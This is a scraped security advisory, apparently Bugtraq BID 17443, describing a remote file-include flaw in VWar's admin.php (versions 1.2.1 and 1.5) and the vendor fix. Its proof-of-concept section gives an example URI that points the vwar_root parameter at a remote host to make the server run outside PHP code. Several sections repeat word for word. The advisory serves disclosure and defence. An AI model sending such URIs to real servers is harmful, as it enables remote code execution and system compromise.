VWar Admin.PHP Remote File Include Vulnerability
BID:17443
Info
VWar Admin.PHP Remote File Include Vulnerability
| Bugtraq ID: | 17443 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2006 12:00AM |
| Updated: | Apr 24 2006 05:16PM |
| Credit: | Liz0ziM is credited with the discovery of this vulnerability. |
| Vulnerable: |
VWar VWar 1.5 VWar VWar 1.2.1 |
| Not Vulnerable: | |
Discussion
VWar Admin.PHP Remote File Include Vulnerability
VWar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
VWar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Exploit / POC
VWar Admin.PHP Remote File Include Vulnerability
This issue can be exploited through a web client.
An example URI has been provided:
http://www.example.com/path/admin/admin.php?vwar_root=http://www.example.com
The following exploit example is also available:
This issue can be exploited through a web client.
An example URI has been provided:
http://www.example.com/path/admin/admin.php?vwar_root=http://www.example.com
The following exploit example is also available:
Solution / Fix
VWar Admin.PHP Remote File Include Vulnerability
Solution:
The vendor has released VWar 1.5.0 R11 to address this issue.
Solution:
The vendor has released VWar 1.5.0 R11 to address this issue.
References
VWar Admin.PHP Remote File Include Vulnerability
References:
References:
- Virtual War File inclusion (milw0rm.com)
- VWar Web Site (VWar)